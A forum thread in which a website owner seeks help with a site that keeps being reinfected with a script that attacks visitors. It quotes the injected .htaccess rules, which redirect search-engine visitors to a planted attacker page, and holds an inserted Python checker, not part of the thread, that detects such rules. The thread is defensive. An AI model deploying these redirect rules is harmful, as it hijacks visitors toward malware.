Website infected with virus - keeps coming back

Hi,

A contact needs some assistance with a website. It just keeps getting infected with a virus.
The website is:

www.philcampbellmusic.co.uk

(WARNING: at the time of writing there is a virus on the above website, which will be brought down in the next few hours and reset. Make sure you have antivirus software on your PC before clicking the link above.)

Whenever we clean it up they soon seem to reinfect it with a virus again. We even took down the administration for the CMS that allowed us to edit the content and of course tried changing various passwords.

The website is hosted by Fasthosts (Linux package, MySQL DB). Is there some weakness in their system which could be making this worse / easier for the culprits to gain access?

Thanks
afflik1923 asked:
afflik1923 (Author) commented:
Still OK since fixing the last attack, but I'm sure an attack is imminent. I will close this thread for now however.

Thanks
0
fosiul01 commented:
Hi,
If the website is hosted on Linux, then I would not say for sure that it has been affected by a virus.

It could be that someone uploaded some script to the server via your CMS, or your server has been compromised.

Can you just explain what makes you think it has been affected by a virus?

Did anyone tell you?

Also, is this shared hosting or VPS hosting?
0
afflik1923 (Author) commented:
If you visit the website running antivirus software and Internet Explorer (say, try it with AVG) then you will see what occurs. In fact I have attached a screenshot.

Also, if you Google Phil Campbell and then click the first result, you are actually redirected to another website.

I can fix it in the short term, but how can I stop this from recurring?

Attachment: ExampleCapture.JPG
0
fosiul01 commented:
OK, from my PC I am getting Troj/JSRedir-D for a script call to a .js file.

If you look at the picture you will see
it's taking /admin/images/check.js as a virus.

It's treating the JS script as a virus.

Like on one of my websites, I had a simple JavaScript, and those antivirus programs would not allow viewing that page because of the JavaScript.

Cleaning the virus on the PC would not make any difference, and also, there is no virus on the server; it's the script you need to check. There is something in the script that is not allowed by the antivirus.

Attachment: virusscript.GIF
0
afflik1923 (Author) commented:
It is a script virus, but that's the problem. It actually tries to compromise visitors' PCs. Fasthosts even closed us down for not sorting it out for a period of time.
Also, the problem at present does not occur in Firefox, only in IE, and the Flash does not play properly.
0
fosiul01 commented:
It's the CMS you are using; I would say the bugs are in that CMS.

Do you have any check.js file at /admin/imagesehi/check.js?
0
xmachine commented:
Hi,

Can you rename both files and upload them here please?

A Symantec Certified Specialist @ your service
0
afflik1923 (Author) commented:
I will upload them ASAP. They are always the files that get changed and they are full of someone else's code.

Unfortunately the original creators of the website have washed their hands of the website a bit, which is frustrating.

Thanks.
0
afflik1923 (Author) commented:
I'm struggling to upload the two infected files right now. But please find the contents of the .htaccess file below (in the code box).
It uses a lot of empty space, so when you first open it it looks empty.

Also, I have now written instructions on how I fix the problem. But it is never long before it comes back. The guide is:

1) Delete the ehi folder in
/htdocs/admin/images/

2) Replace the two files
flashEmbed.js
pageSwitch.js
with non-infected versions.

3) Open the .htaccess file in the root folder for editing and delete all of its content.

If I run these three steps the website is back to normal. But how do I find and close whatever hole is letting whoever it is in?


# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /admin/images/ehi/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c
0
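Two checks a site owner could run against the symptoms in this thread, as an added example that is not code from the thread or from the hosting provider: flag .htaccess rewrite rules that only fire for visitors arriving from a search engine (the cloaking pattern in the rules quoted above, which is why the redirect showed up via a Google result but not when typing the URL), and compare the repeatedly overwritten files against a clean baseline so reinfection is noticed promptly. The sample rules are a shortened, constructed copy of the quoted ones; the watched file names come from the post but their real paths are assumptions.

```python
# Added example, not from the thread; file names and paths below are assumptions.
import hashlib, re, tempfile
from pathlib import Path

# RewriteCond keyed on a search-engine referrer: the cloaking trick in the post.
SEARCH_REFERER = re.compile(
    r"RewriteCond\s+%\{HTTP_REFERER\}\s+.*\b(google|msn|yahoo|live|ask|yandex|bing)\b", re.I)
REWRITE_RULE = re.compile(r"RewriteRule\s+\S+\s+(\S+)", re.I)

# Constructed sample, shortened from the rules quoted in the post.
SAMPLE_HTACCESS = r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|yandex)\. [NC]
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /admin/images/ehi/ex3/t.htm [L]
"""
# Files the post says keep getting overwritten (kept flat here; real paths differ).
WATCHED = ["flashEmbed.js", "pageSwitch.js", ".htaccess"]

def suspicious_redirects(htaccess_text):
    """Return RewriteRule targets that only fire for search-engine visitors."""
    hits, gated = [], False
    for line in (l.strip() for l in htaccess_text.splitlines()):
        gated = gated or bool(SEARCH_REFERER.search(line))
        m = REWRITE_RULE.match(line)
        if m and gated:
            hits.append(m.group(1))
        if m:
            gated = False  # a RewriteRule consumes the RewriteConds before it
    return hits

def snapshot(root, names):
    """SHA-256 of each watched file; keep this baseline off the server."""
    return {n: hashlib.sha256((Path(root) / n).read_bytes()).hexdigest() for n in names}

def changed_since(root, known):
    """Watched files modified or deleted since the baseline was taken."""
    out = []
    for name, digest in known.items():
        p = Path(root) / name
        if not p.exists() or hashlib.sha256(p.read_bytes()).hexdigest() != digest:
            out.append(name)
    return sorted(out)

def demo():
    """Constructed run: baseline the watched files, tamper with one, report it."""
    root = Path(tempfile.mkdtemp())
    for n in WATCHED:
        (root / n).write_text("// clean\n")
    known = snapshot(root, WATCHED)
    (root / WATCHED[0]).write_text("// clean\n// appended by someone else\n")
    return changed_since(root, known)
```

On shared hosting where Apache itself cannot be changed, running `changed_since` from a cron job or a local script against a fresh download of the site is a practical substitute for server-side file integrity monitoring.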
afflik1923 (Author) commented:
So, any ideas on this? At present the virus is not present as I cleaned it up again, but I know sooner or later it will rear its head again. It would be nice to close whatever hole is open.

Thanks
0
xmachine commented:
Additional Countermeasures:

Please check the following articles for additional countermeasures:

http://25yearsofprogramming.com/blog/20071223.htm

http://25yearsofprogramming.com/blog/20070705.htm

http://thedesignspace.net/MT2archives/000505.html

Check your website for any infected pages:

http://www.unmaskparasites.com/


To secure your website(s), it's recommended to install Apache Mod_security:

http://www.modsecurity.org/projects/modsecurity/apache/index.html

http://www.onlamp.com/pub/a/apache/2003/11/26/mod_security.html

http://www.howtoforge.com/apache_mod_security

http://www.linuxjournal.com/article/8708


A Symantec Certified Specialist @ your service
0
afflik1923 (Author) commented:
I will check out some of these links, but I would also add: don't forget I'm using a shared host, so I doubt I would be able to make changes to the Apache installation?
Do you think the web host themselves (Fasthosts) play some part in the weak security?
0
xmachine commented:
Hi,

Yes, you should ask them on how to add/enable mod_security for apache. Otherwise, change the hosting provider. If they can't protect, it's the time for an upgrade.

Check the following providers + guides:

http://litespeedtech.com/solutions/webhosting/

http://blog.eukhost.com/webhosting/how-to-install-mod_security-for-apache/

http://www.sharkspace.com/helpcenter/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=88&nav=0,22


A Symantec Certified Specialist @ your service
0
afflik1923 (Author) commented:
Note: I thought I had already awarded points for this question, but if this has not happened let me know. I believe I have awarded points and accepted my own summary answer.

Thanks
0